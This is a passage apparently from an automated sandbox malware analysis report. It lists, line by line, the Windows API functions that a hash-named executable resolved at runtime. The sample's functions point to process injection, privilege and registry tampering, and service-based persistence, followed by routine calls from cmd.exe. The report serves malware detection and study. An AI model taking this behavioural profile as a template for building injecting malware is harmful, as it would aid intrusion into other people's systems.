(UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005872)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 